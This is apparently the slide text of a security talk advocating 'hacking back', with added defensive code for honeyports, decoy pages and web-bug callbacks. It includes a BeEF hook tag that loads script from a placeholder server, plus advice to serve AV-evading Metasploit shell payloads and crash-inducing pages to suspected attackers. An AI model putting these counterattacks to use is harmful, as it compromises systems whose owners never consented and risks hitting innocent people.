paul asadoorian - bringing sexy back
Bringing Sexy Back: Defensive Measures That Actually Work
Paul Asadoorian ([email protected])
John Strand ([email protected]) http://pauldotcom.com
Paul Asadoorian
Goal: Bring Sexy Back
http://pauldotcom.com
Outline
• # whoami
• Introduction - OODA, Don't run away
• Case Studies - Reasons why we CAN do this
• Warning banners - Allows you to do things you disclose
• Annoyance - Mr. Clippy, User Agent, Spider Traps
• Attribution - BeEF, Metasploit Decloak
• Attack - SET, Java payloads, purple ASCII art
Introduction
Yes, I said “Hacking Back” but don’t run away
Disclaimer
The contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.
Any action you take from this presentation should be documented in writing before implementing.
First off, why are we talking about “hacking back”?
Successful Penetration Tests
• Most organizations provide easy access to their “intellectual property”
• How many pentests have you been on?
• How many of those were successful?
• Or?
• How many women have you dated?
• How many have you slept with?
Why Are Penetration Tests Always So Successful?
1. Flimsy Defensive “Layers”
2. Social Engineering
Because there is no patch for human stupidity...
John & Paul Then Thought
• We can do better
• What if we were to defend systems, applying what we know about attacks?
• For so long we've gone down the beaten path that we call “security”
• It's time to break the mold
We also thought about how messy we get when eating noodles, but someone beat us to the solution...
Why Use Offensive Countermeasures?
• There are times where you will be required to do “more”
• In particular when working with law enforcement
• The attackers are getting more and more brazen
• Very little perceived risk on their part
• We have rules, they don't follow rules
• You may need to figure out what an attacker is after or gather information about them
• e.g. If they are attacking from a bot-net or through TOR
OODA
• Whoever can do these things the fastest lives:
• Observe
• Orient
• Decide
• Act
• Originally developed for fighter pilots
• With current security models, how many of these steps can you impact?
• Works both ways: dis-orient attackers!
John Boyd
Paul, “fighting”
Case Studies
Stuff other people did that makes what we’re going to do look okay
Case Study: Consent to University Network Terms
• Sysadmin hacks into threatening machine
• Gathered evidence used against student using temp/temp creds
• Student's consent to university terms justifies sysadmin
• U.S. v. Heckenkamp
• Kevin Poulsen, “Court Okays Counter-Hack of eBay Hacker's Computer,” Threat Level, April 6, 2007
• http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
“A federal appeals court just shot down an attempt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convictions, which were an end result of information provided by a university sysadmin who broke into Heckenkamp's computer to gather evidence.”
Case Study: Public Example of Reflected Attack
• 1999 - World Trade Organization website
• DoS attack from E-Hippies Coalition
• Hosting service Conxion reflected the attack back to E-Hippies and disabled its website
• Conxion not prosecuted
• http://www.networkworld.com/research/2000/0529feat2.html
"So we told our filtering software to redirect any packets coming from these machines back at the e-hippies Web server"
Case Study: MSFT Court Order - Botnet
• Civil lawsuit, 2010
• Court issues order to suspend the domains associated with the Waledac botnet
• MSFT takes “other technical measures” to degrade the botnet
• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber-Defense-Law-Botnet-Computer-Crime-Lawsuit
“Notice that Microsoft is not doing this in the dark. It is working through our open public court system, so that Microsoft is transparent and accountable and all can see what is happening and evaluate it.”
Case Study: DOJ Takes Over 2 Million Node Botnet
• A judge gave permission to the FBI and U.S. Marshals to set up servers to stop the Coreflood botnet
• They were also given permission to “send commands to infected computers that stops the Coreflood virus”
• They seized 5 servers and 29 domain names
• DOJ now owns 2.5 million computers on the Internet, and will essentially tell the malware to self-destruct
• What, this isn't sexy enough for you?
Let's Pretend I'm a Lawyer
• I'm advising you to:
• Discuss
• Document
• Plan
• Consult with others, reveal your plans!
• Hiding intentions means you think what you are doing is “wrong”
• Rule of thumb: Don't be evil
• While it can seem like a lot of fun, it can get you in big trouble
Note: We love the EFF (eff.org, go donate!)
Okay, Let's Stop Pretending
• Could this get you into trouble?
• Possibly. There is still some debate on how to do it properly
• There are a few things we can avoid to keep us from getting in trouble
• Don't ever put malware where it is publicly accessible
• Don't make it too easy to get to
• Use Warning Banners...
Warning Banners
Warning, we are going to talk about warning banners...
Look at Your Warning Banner
• There is a lot in there about permission
• There are a number of technologies that will “check” your system before it accesses the network
• OpenVPN scripts (like a NAC check)
• Windows 2008 Network Access Protection
• Is it possible to use this as a means to gather some information about an attacker's system?
• Put in your warning banner that you can do what you want!
Example: Eric Needed a Warning Banner
• What do a kitchen knife, a crutch, and duct tape have to do with anything?
• It is illegal to set up lethal traps for trespassers
• However, if you tell them there may be evil things on your network/property, you warned them
"super went to open the door, felt resistance and found the rigged contraption" -- a big knife duct-taped to a crutch, which was installed with an elastic cord. The super was not injured.
Eric Stetz was arrested and charged with reckless endangerment for a vicious-looking booby trap.
http://gothamist.com/2008/04/06/homemade_booby.php
WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own
risk!
Would this have kept Eric Stetz out of trouble?
FREE VASECTOMY
This likely would not have kept Eric Stetz out of trouble...
Reality Check: Don't Be Stupid (like Eric)
• How could this go wrong for you?
• Dumb moves (like knife crutches)
• Easily accessible malware (e.g. traps)
• Full attacks on attacker IP addresses
• Purposely damaging systems
• Persistent long-term access to bad guys
• We have smarter options to work with:
1. Annoyance
2. Attribution
3. Attack
Annoyance
Stressing out the attackers...
Annoyance: HoneyPorts
• Forces attackers to make a full connection to avoid spoofing pitfalls
• Attackers and testers hate this........
@echo off
REM One pass (schedule it or loop it); something must be listening on TCP/3333 so the handshake completes. "ESTABLISHED" skips the listener's own 0.0.0.0:0 line
for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^" ^| find ^"ESTABLISHED^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
If a machine makes a full TCP connection to port 3333, a firewall rule is added to block the source IP address
Annoyance: HoneyPorts
• Works on Linux too of course, same concept
• Must have a working copy of Netcat on your system
• Should be modified to log entries and report back to the enterprise SIEM
while true; do
  # traditional netcat prints "connect to [...] from (UNKNOWN) [1.2.3.4] 5555" on stderr
  IP=$(nc -v -l -p 2222 2>&1 1>/dev/null | grep from | cut -d[ -f3 | cut -d] -f1)
  if [ -n "$IP" ]; then
    logger -t honeyport "full connect to tcp/2222 from $IP, blocking"   # syslog -> SIEM
    iptables -A INPUT -p tcp -s "$IP" -j DROP
  fi
done
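The same honeyport idea as the two one-liners above, written out as an added example (not code from the slides or from the PaulDotCom honeyport scripts). It separates the blocking decision from the listener so the command it is about to run can be inspected, emits the SIEM event the slide asks for, validates the peer address before it goes anywhere near a shell (the netcat pipeline above hands whatever grep and cut produce straight to iptables), and refuses to block allowlisted addresses so you cannot cut off your own scanners or jump host. The allowlist entries, the JSON field names and the rule name are assumptions.

```python
"""Honeyport listener with block + SIEM reporting (added example)."""
import ipaddress
import json
import socket
from datetime import datetime, timezone

# Assumption: hosts/nets that must never be blocked (your own scanners, jump boxes).
# Locking yourself out of a box with a honeyport is the classic self-inflicted wound.
ALLOWLIST = ("10.0.0.5", "192.168.1.0/24")


def is_allowlisted(ip, allowlist=ALLOWLIST):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n, strict=False) for n in allowlist)


def block_command(ip, platform="linux"):
    """Firewall command for one peer. ipaddress.ip_address() raises ValueError on
    anything that is not a literal address, so a mangled netcat line or a hostile
    string can never be spliced into a shell command."""
    addr = ipaddress.ip_address(ip)
    if platform == "linux":
        return f"iptables -A INPUT -p tcp -s {addr} -j DROP"
    if platform == "windows":
        return (f'netsh advfirewall firewall add rule name="honeyport-{addr}" '
                f"dir=in remoteip={addr} localport=any protocol=TCP action=block")
    raise ValueError(f"unsupported platform: {platform!r}")


def siem_event(ip, src_port, honeyport, action, when=None):
    """One JSON line per connection; ship it to the SIEM (syslog, a log shipper, ...)."""
    when = when or datetime.now(timezone.utc)
    return json.dumps({"ts": when.isoformat(), "event": "honeyport_connect",
                       "src_ip": ip, "src_port": src_port, "dst_port": honeyport,
                       "action": action}, sort_keys=True)


def handle_peer(ip, src_port, honeyport, platform="linux", allowlist=ALLOWLIST):
    """Decision for one completed handshake: (firewall command or None, SIEM event)."""
    if is_allowlisted(ip, allowlist):
        return None, siem_event(ip, src_port, honeyport, "allowlisted")
    return block_command(ip, platform), siem_event(ip, src_port, honeyport, "block")


def serve(honeyport, run_command, platform="linux", bind="0.0.0.0"):
    """accept() only returns after the three-way handshake, so unlike a SYN seen in
    a packet capture, the peer address here is one the attacker can really receive on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, honeyport))
    srv.listen(5)
    while True:
        conn, (ip, src_port) = srv.accept()
        conn.close()  # nothing legitimate talks to this port; we only want the address
        cmd, event = handle_peer(ip, src_port, honeyport, platform)
        print(event)
        if cmd:
            run_command(cmd)


if __name__ == "__main__":
    import shlex
    import subprocess
    # Needs root for iptables. Pass print instead of subprocess.run for a dry run.
    serve(2222, lambda c: subprocess.run(shlex.split(c), check=False))
```

Run it as root with the port you chose for the honeyport, and feed the printed JSON lines into whatever already ships logs off the host; the block command is returned rather than executed inside handle_peer() so it can be logged, dry-run or swapped for a WIPS/NAC API call without touching the listener.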
Annoyance: Mr. Clippy
• Through PHPIDS we can make attacking a website “interesting”
• First, install PHPIDS
• PHPIDS has clipping thresholds
• Then create a rule for all attackers to pull up Mr. Clippy
Annoyance: Making Your Website Look Like Something Else
Oh, you're IIS, here are all my IIS attacks!
Annoyance: Filter User-Agent Strings
• Filter the User-Agents in use by attackers and testers:
• Nikto, Acunetix, “I am Hacking You”
• Sites do not lock down the mobile version of the website
• There has been a lot of research in this area by Chris John Riley
• E.g. using the iPhone User-Agent reveals the mobile version of the site
• Some people don't secure the mobile version
• What if you present traps or DoS conditions based on User-Agent?
<?php
// getenv() takes a string; the bare constants in the original only worked because
// pre-PHP 8 silently treated an undefined constant as its own name
$ip = getenv('REMOTE_ADDR');
$useragent = getenv('HTTP_USER_AGENT');
$to = "[email protected]";
$subject = "Robots honeypot from " . $ip;
$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;
mail($to, $subject, $body);
// The User-Agent is attacker-controlled: escape it before reflecting it into HTML
$safe_ua = htmlspecialchars($useragent, ENT_QUOTES, 'UTF-8');
echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1>");
echo("Your IP address is: " . $ip . "<br>\n");
echo("Your User Agent is: " . $safe_ua . "</html>\n");
?>
Annoyance: Messing with Attackers' Heads
Credit Josh Wright: http://mail.pauldotcom.com/pipermail/pauldotcom/2009-February/000713.html
Annoyance: Messing with Attackers' Heads
This all happened in the same day!
Fun part is we get to make things up as to why this happened...
Annoyance: Evil Web Servers
• Many testers and attackers use automated crawling
• This helps identify pages and possible insertion points for their attacks
• If they say they don't, they are probably lying
• *Maybe* there is a way to attack the tools
• Setting up a DoS condition for their automated scanner
• Note: This is not something you want to try on an external web server that you want to have crawled by Google
• Configure robots.txt to point to resources you control
• NOT something you put in your index.php page!
Exploiting Existing Vulnerabilities
• Acunetix DoS in Sniffer Component
• http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23507
• WebInspect Crashes Loading Reports
• http://seclists.org/educause/2009/q3/526 “We can run the scans but if you select a report that has critical vulnerabilities in it the report generator crashes with invalid characters.”
• AppScan Vulnerabilities
• SSL: https://www-304.ibm.com/support/docview.wss?uid=swg1PM24290
• Login Recording: https://www-304.ibm.com/support/docview.wss?uid=swg1PM04998
Evil Annoyance: Fuzzing Attacker Tools
• Why not browse the attackers'/testers' tools?
• There are a number of different browser fuzzers available
• Bf3, Sulley, Python
• We can also use DOM-Hanoi
• Geared towards browser fuzzing, but hey. It works
• Actually, it just takes a long time to run
• Goal: Build a page that consistently crashes the attacker's tool!
Spidertrap & WebLabyrinth
• Spidertrap: Small Python script to trap web spiders
• Ben Jackson created a PHP version called WebLabyrinth
• It is PHP so you can load it in your web infrastructure
• Has a number of cool features
• Gently tells Googlebot to go away
• Random HTTP codes
• *NEW* Database support
• *NEW* Alerting with IDS-style rules
• David Bowie Approved
Keeping it “Real”
This is Going to Take a While...
Alsoannoying
Helps the Internet Be a Better Place?
The IP address 209.20.92.14 wandered into the labyrinth:
[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]
“/admin” on my server redirects people or bots to the labyrinth:
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
Interesting User Agent, eh?
Helps the Internet Be a Better Place?
• Turns out “ZmEu” is a popular string for the user agent to contain for bots looking for insecure web applications
• If the automated bots waste time in my labyrinth, that's less time they spend attacking other sites
• It's also less time they spend on my own site trying lame attacks, that likely would not work anyway
• My “traps” should also spring on some of the following requests as well:
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
[client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin
Laughing at me or laughing at them?
• Nice to see attackers are smiling at me, or not
• Multiple attempts from different IPs across multiple servers
• About “anti-sec”:
[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
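Pulling together the User-Agent filtering, the robots.txt decoy and the labyrinth redirect from the slides above, here is an added example (not the slides' code, and not WebLabyrinth or Spidertrap) that triages web server logs: it parses combined-format lines, flags known scanner User-Agents, hits on decoy paths advertised in robots.txt, and repeated admin-panel guesses like the phpmyadmin/dbadmin probes in the error log, and returns the source IPs to redirect into the labyrinth. The decoy paths, the probe threshold and the 198.51.100.x log lines are constructed; the two ZmEu lines are the ones shown on these slides.

```python
"""Scanner and decoy-path triage over web server logs (added example)."""
import re
from collections import defaultdict

# Assumption: paths that exist only to be advertised in robots.txt and trapped.
DECOY_PATHS = ("/admin/", "/admin/admin.php", "/backup/")
# User-Agent fragments named on the slides as scanner or bot signatures.
SCANNER_UA = ("Nikto", "Acunetix", "I am Hacking You", "ZmEu")
# Blind admin-panel guesses from the slides' error log (matched case-insensitively).
PROBE_PATHS = ("/phpmyadmin", "/dbadmin", "/myadmin", "/w00tw00t.")

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

SAMPLE_LOG = [
    # the two lines below are copied from the slides
    '209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"',
    '65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"',
    # constructed: two admin-panel guesses, a benign crawl, a decoy hit
    '198.51.100.7 - - [17/Mar/2011:21:40:00 +0000] "GET /phpMyAdmin/ HTTP/1.1" 404 239 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Mar/2011:21:40:01 +0000] "GET /dbadmin/ HTTP/1.1" 404 239 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [17/Mar/2011:21:41:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
    '198.51.100.9 - - [17/Mar/2011:21:42:00 +0000] "GET /admin/admin.php?x=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def robots_txt(decoys=DECOY_PATHS):
    """Advertise the decoys. Polite crawlers stay out; a scanner that harvests
    Disallow lines for targets walks straight into the trap."""
    return "User-agent: *\n" + "".join(f"Disallow: {p}\n" for p in decoys)


def parse(line):
    """Combined log format -> dict, or None for lines that do not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """'scanner' on a known tool UA, 'decoy' on a robots.txt trap, 'probe' on an
    admin-panel guess, otherwise 'normal'."""
    path = re.sub(r"/+", "/", rec["path"].split("?", 1)[0])  # //admin/ -> /admin/
    ua = rec["ua"].lower()
    if any(s.lower() in ua for s in SCANNER_UA):
        return "scanner"
    if any(path == d or path.startswith(d.rstrip("/") + "/") for d in DECOY_PATHS):
        return "decoy"
    if any(path.lower().startswith(p) for p in PROBE_PATHS):
        return "probe"
    return "normal"


def triage(lines, probe_threshold=1):
    """Return {ip: 'labyrinth'} for sources to redirect. A scanner UA or a decoy
    hit is enough on its own; probes must exceed the threshold first, so one
    mistyped URL from a real user does not send them into the maze."""
    probes = defaultdict(int)
    actions = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind in ("scanner", "decoy"):
            actions[rec["ip"]] = "labyrinth"
        elif kind == "probe":
            probes[rec["ip"]] += 1
            if probes[rec["ip"]] > probe_threshold:
                actions[rec["ip"]] = "labyrinth"
    return actions


if __name__ == "__main__":
    print(robots_txt())
    for ip, action in triage(SAMPLE_LOG).items():
        print(f"{ip:16} -> {action}")
```

In production the output of triage() would feed a RewriteMap or a dynamic blocklist that the web server consults on each request; the threshold exists because a real user who mistypes /phpmyadmin once is not an attacker, while a tool that announces itself as ZmEu or reads its targets out of robots.txt is.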
Attribution
I can still see you...
Protecting Your Intellectual Property
• “Callbacks” - Similar to software updates
• Sends information back to home base about the system
• IP address, hardware and software configurations
• Microsoft Genuine Advantage, crash dumps
• Tracking software in phones
• Just look at Android... Does “checkers” really need access to my contact list and call history?
• We are not necessarily talking about “hacking” per se
• We are talking about getting attribution
Word Web-Bugs
• Feature built into exploit frameworks for penetration testing
• This tactic works great for tracking intellectual property
• Not all forms of attribution need to result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros
• The callback should go to a closely monitored system
ThisislikeSpyStuff,likeJamesBond...
“OhhhhhhJames...” See,DefenseISSexy!Eh?
How does it work?
• It simply inserts a reference to a CSS resource on a system you control, in this case one running Core IMPACT
• When the doc is opened it tries to open the URL
• Direct connection!
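To make that callback attributable, each planted document needs its own URL. This added example (not from the slides, Core IMPACT or Metasploit) shows the receiving side: the URL carries an HMAC over the document label, so a hit tells you which bait file was opened, and tokens that were guessed, enumerated, or copied from one document's URL onto another are rejected instead of being logged as attribution. The callback host, secret and document name are assumptions; how the reference is embedded in the document is left to whatever framework generates it.

```python
"""Per-document callback tokens for web-bug attribution (added example)."""
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlparse

CALLBACK_HOST = "https://callback.example.net"  # assumption: a closely monitored host
SECRET = b"replace-with-a-random-per-deployment-key"  # assumption


def _tag(label, secret):
    return hmac.new(secret, label.encode(), hashlib.sha256).hexdigest()[:32]


def bait_url(label, secret=SECRET, host=CALLBACK_HOST):
    """URL to reference from the bait document (stylesheet/image). The HMAC binds
    the document name, so a hit cannot be faked or re-labelled without the key."""
    return f"{host}/s.css?" + urlencode({"d": label, "t": _tag(label, secret)})


def resolve_callback(url, remote_addr, user_agent, secret=SECRET):
    """Receiver side: verify the token and return an attribution record, or None
    when the token is missing or forged (log those separately; they are noise,
    or someone poking at the callback host itself)."""
    qs = parse_qs(urlparse(url).query)
    label = qs.get("d", [None])[0]
    tag = qs.get("t", [None])[0]
    if not label or not tag:
        return None
    # compare_digest on bytes: constant time, and tolerant of junk in the query
    if not hmac.compare_digest(_tag(label, secret).encode(), tag.encode()):
        return None
    return {"document": label, "src_ip": remote_addr, "user_agent": user_agent}


if __name__ == "__main__":
    url = bait_url("SSN.xls")
    print("embed in the document:", url)
    # Constructed callback, as the web server would hand it to you:
    print(resolve_callback(url, "203.0.113.9", "Microsoft Office Word 2010"))
```

Keep the secret off the web server that hosts the bait documents: whoever steals the files should not also be able to mint valid tokens and spray your callback host with fake "opened" events.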
Web Application Streetfighting
• How can we use JavaScript against the attackers?
• BeEF (Browser Exploitation Framework)
• Harvest information
• Send direct links
• Possibly exploit their systems (XMLRPC)
• Maybe we could just mess with them
• Send indications of XSS and SQLi in every response to their attacks
• We need to have a wide variety of tools and techniques
BeEF: Get the attacker to connect
• Lead the attacker to a decoy site that no legit user would visit
• Example: robots.txt:
User-agent: *
Disallow: /admin/admin.php
• Example: admin.php displays a bogus login page
• Hidden in admin.php is “The Hook”:
<script language='Javascript' src='http://<yourserver>/beef/hook/beefmagic.js.php'></script>
I like ninja grappling hooks....
Hooked on BeEF: Now what?
• Capabilities are broad
• Gather info
• Browser type and version, OS type and version, screen resolution, etc.
• Simple popup:
Attackers use IIS 6.0? No Way!
BeEF Modules
• The issue is deciding how far to go
• Do you cross the line between info gathering and attacking the attacker(s) system?
• You can do that with BeEF, not saying that you should, but you can if you have permission
• Cross the line: Many built-in modules
• Metasploit integration: Browser Autopwn, SMB Challenge Theft, etc.
• DoS may be okay, and this seems like a good place to build a DoS for your favorite, or not-so-favorite, hacking tool
• Example: Find an exploit for Nikto and put it into BeEF
BeEF Modules (2)
Who else have they hacked?
Who are they really? How are they hiding?
Send them to your competition
Attribution: Decloak
• From the Metasploit project
• More information: http://decloak.net/
• Great place to redirect users from robots.txt
• Many attackers and penetration testers will use proxies and/or Tor to hide their IP address
• Decloak can reveal the real IP address of the scanner
“This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services.”
Wireless Countermeasure Example
• Step 1: Set up a hidden SSID (“private” or “guest”)
• Step 2: Use a captive portal when people connect to it
• Step 3: Portal login page contains BeEF hook or SET exploit (use your warning banner!)
• Step 4: Collect information about the attacker (dissolvable agents)
• Step 5: (OPTIONAL) Ban WiFi MAC on WIPS and/or wireless network (works until they change it)
Gotchas
• Make sure the SSID has access to nothing, or just more honeypots
• Tough one: Prevent real users from connecting to it
• Tougher one: Make attackers think it's a real SSID & network
• Danger: Make sure your BeEF server is not a jumping-off point
Pwning yourself is not fun
Wireless: More Thoughts
• Send wireless driver exploits on the network, triggered by some event
• Easily will backfire...
• Answer to clients probing for non-production networks, send them to a page that tells them they are mis-configured (beat the attackers to it)
• May really piss off users
• Bluetooth Canary - Leave a Bluetooth phone with OBEX enabled
• Have an address book with numbers that all route to you
Attack
Gopher is an old protocol too...
Attack: Java Payload
• If we can get an attacker to load a Java payload, why not give them something interesting, like a Metasploit payload?
• Java payloads are awesome for penetration testers, no vulnerabilities required!
• They can also be useful for attackers...
Just for @beaker and @attrition
Evil Java Application
• Embed a malicious Java application in a non-production web server
• Usually in a directory that is noindex and/or nofollow in robots.txt
• The attacker/victim will get a pop-up asking if they want to open the Java application
• They will, attackers tend to be very curious
• The payload can be flexible (Shell, Rootkit, VNC)
• You can automatically run enumeration scripts when the attacker/victim runs the application
Browsing to Your Site
Everyone Clicks “Run”
http://[YourLinuxIP]
Configuring SET
Dave Kennedy, the author of SET, loves purple.
Choosing your Payload
Encoding to Dodge AV
Have Your BackTrack System Surf to SET
Not Pretty.. But it Works
Precautions and Usage
• Put this on the inside of the network
• Careful an attacker doesn't redirect your users
• Make sure no one can take over your Metasploit instance
• Don't have to do anything with the shell
• You can autorun certain non-damaging commands
• ping your system
Listen
- http://pauldotcom.com/radio (24/7)
- Podcast in iTunes (audio/video)
Watch
- Live! http://pauldotcom.com/live
- “TV” http://pauldotcom.blip.tv
Participate
- Mailing List: http://mail.pauldotcom.com
- Community: http://pauldotcom.com/insider
- IRC: irc.freenode.net #pauldotcom
Read
- http://pauldotcom.com (Blog)
- Email us [email protected]
Want More? (Shameless Plug)
OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
Black Hat Las Vegas 2011
Register Today!
The End
Wake up, time for Questions?